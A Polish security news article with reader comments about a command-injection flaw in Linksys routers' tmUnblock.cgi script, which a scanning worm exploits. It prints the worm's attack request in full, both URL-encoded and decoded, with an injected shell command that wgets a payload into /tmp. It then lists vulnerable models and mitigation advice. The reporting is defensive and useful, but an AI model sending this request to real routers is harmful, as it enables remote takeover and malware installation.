Chyba już nikogo nie zaskoczy fakt, że w domowych ruterach Linksysa wykryto kolejny poważny błąd, umożliwiający zdalne przejęcie całkowitej kontroli nad urządzeniem. Na dokładkę błąd używany jest przez robaka, skanującego internet.
Kilka dni temu opisaliśmy robaka, który atakuje rutery Linksysa za pomocą niezidentyfikowanego błędu i wykorzystuje je do szukania kolejnych ofiar. Od niedawna wiadomo, o jaki błąd chodzi.
Na czym polega atak
Odkryto, że nie dość, że jeden z parametrów skryptu obsługującego blokowanie i odblokowywanie stron dostępnych za pomocą rutera jest podatny na wstrzyknięcie dowolnego polecenia powłoki, to na dokładkę wykonanie tego skryptu odbywa się bez weryfikacji uprawnień użytkownika.
Przykładowy atak wygląda tak:
POST /tmUnblock.cgi HTTP/1.1 Host: 192.168.0.1:8080 User-Agent: Mozilla/4.0 (compatible; MSIE 4.01; Mac_PowerPC) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.0.1:8080/ Authorization: Basic YWRtaW46JmkxKkBVJDZ4dmNH Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 518 %73%75%62%6d%69%74%5f%62%75%74%74%6f%6e%3d&%63%68%61%6e%67%65%5f%61%63 %74%69%6f%6e%3d&%73%75%62%6d%69%74%5f%74%79%70%65%3d&%61%63%74%69%6f %6e%3d&%63%6f%6d%6d%69%74%3d%30&%74%74%63%70%5f%6e%75%6d%3d%32&%74%74 %63%70%5f%73%69%7a%65%3d%32&%74%74%63%70%5f%69%70%3d%2d%68%20%60%63 %64%20%2f%74%6d%70%3b%69%66%20%5b%20%21%20%2d%65%20%2e%4c%32%36%20 %5d%3b%74%68%65%6e%20%77%67%65%74%20%68%74%74%70%3a%2f%2f%xx%xx%2e %xx%xx%xx%2e%xx%xx%xx%2e%xx%xx%xx%3a%31%39%33%2f%30%52%78%2e%6d%69 %64%3b%66%69%60&%53%74%61%72%74%45%50%49%3d%31
Autoryzacja co prawda jest wymagana, jednak hasło podane przez użytkownika nie jest weryfikowane. Treść żądania musi być zakodowana, by nie zostać zniekształcona w trakcie przetwarzania, a po odkodowaniu wygląda tak:
submit_button=&change_action=&submit_type=&action=&commit=0&ttcp_num=2&ttcp_size=2
&ttcp_ip=-h
`cd /tmp;if [ ! -e .L26 ];then wget http://192.168.0.1:193/0Rx.mid;fi`
&StartEPI=1
Powyższy przykład to fragment ataku wspominanego wcześniej robaka. Mamy zatem do czynienia z możliwością zdalnego wykonania kodu przez każdego użytkownika, który może połączyć się z interfejsem www rutera. Oznacza to, że na zdalny atak podatne są jedynie urządzenia, których witryna administracyjna jest publicznie dostępna w sieci. Rutery, które mają wyłączony dostęp zdalny, podatne są jedynie na atak lokalny i ich posiadacze w zasadzie mogą spać spokojnie.
Jeśli Wasz ruter Linksysa ze standardowym oprogramowaniem jest dostępny zdalnie, to zalecamy szybką zmianę tego ustawienia, ponieważ w sieci zostały już opublikowane przykładowe kody źródłowe exploitów.
Które urządzenia są podatne
Według naszej analizy urządzeń, które aktywnie prowadzą ataki, podatne są co najmniej poniższe modele i wersje oprogramowania:
- E1000 2.1.01 build 5
- E1200 1.0.00 build 11
- E1200 2.0.04 build 1
- E1200 2.0.05 build 2
- E1200 2.0.06 build 6
- E1500 1.0.01 build 4
- E1500 1.0.04 build 2
- E2500 1.0.01 build 3
- E2500 1.0.03 build 4
- E2500 1.0.04 build 1
- E2500 1.0.05 build 1
- E2500 1.0.05 build 2
- E2500 1.0.07 build 1
- E3200 1.0.00 build 13
- E3200 1.0.01 build 3
- E3200 1.0.03 build 9
- E3200 1.0.04 build 1
- E4200 1.0.02 build 13
- E4200 1.0.04 build 11
- E4200 1.0.05 build 7
Dodatkowo w kodzie robaka odnaleziono listę urządzeń, które próbuje infekować – jest ona dużo dłuższa i nie wiemy, czy wszystkie znajdujące się na niej modele są podatne. Oprócz modeli wymienionych powyżej mogą to także być:
- E3000
- E2100L
- E2000
- E1550
- E900
- E300
- WAG320N
- WAP300N
- WAP610N
- WES610N
- WET610N
- WRT610N
- WRT600N
- WRT400N
- WRT320N
- WRT160N
- WRT150N
Jeśli Wasz ruter nie znajduje się na powyższej liście, to tak czy inaczej zalecamy wyłączenie zdalnego dostępu i zmianę hasła administratora.
Komentarze
Dobrze, że prują ostatnio tak te routery. To jednak ważna furtka do naszego bezpieczeństwa w Internecie i firmy powinny tworzyć oprogramowanie jak najwyższej jakości.
Dlatego warto używać alternatyw (Tomato, DD-WRT) – pod warunkiem, że pod dane routery został takowy przygotowany.
Tylko przeciętny użytkownik tego nie zrobi: a) nie potrafi b) będzie obawiał się utraty gwarancji, zepsuje itp. dlatego firmy powinny dokładać wszelkich starań, aby to łatać oraz uczulać użytkowników do sprawdzania czy na ich sprzęt wyszła nowsza wersja oprogramowania do wrzucenia przez 2 kliknięcia lub inny prosty sposób np. status update’ów na głównej stronie konfiguracji routera. Chociaż skoro kogo nie spytasz to nie pamięta/zna hasła do panelu zarządzania routerem, więc o czym my tu mówimy…
„Rutery, które mają wyłączony dostęp zdalny, podatne są jedynie na atak lokalny i ich posiadacze w zasadzie mogą spać spokojnie” a co jeśli udostępniamy sieć publiczne? W pracy, szkole, prowadzimy wynajem pokoi i udostępniamy WIFI? Też możemy spać spokojnie?
Przez spać spokojnie, autor zapewne miał na myśli zwykłych użytkowników domowych, a oni powinni wiedzieć komu dają dostęp, a rotacja takich osób także chyba nie jest zbyt wielka, prawda :)?
Dla takich zastosowań, administratorzy / osoby opiekujące się siecią powinny wymóc na przełożonych zakupienie dedykowanego rutera, który będzie spełniał rolę sieci dla wszystkich. Sieć biurowa nie powinna być współdzielona. Dla mnie brak takiego podziału to trochę jak jazda gołą du*ą po nieoheblowanej desce…
Piszcie o linksysie a dajecie zdjęcia d-linka (posiadam taki więc rzuciło mi sie w oczy) a ja już zaczynałem testowanie :/
Słuszna uwaga, poprawione.
A patche jakies na to sa? I faktycznie routery powinny sie latwiej patchowac.
MSIE 4.01; Mac_PowerPC ? kto tego jeszcze uzywa ?
No i mamy piękny botnet dzięki temu błędowi
http://thehackernews.com/2014/02/linksys-malware-moon-spreading-from.html
Było o nim u nas kilka dni temu ;)
A to dopiero początek. Prawdziwa zabawa z routerami, dopiero się zaczyna. Biada tym co mają pootwierane porty…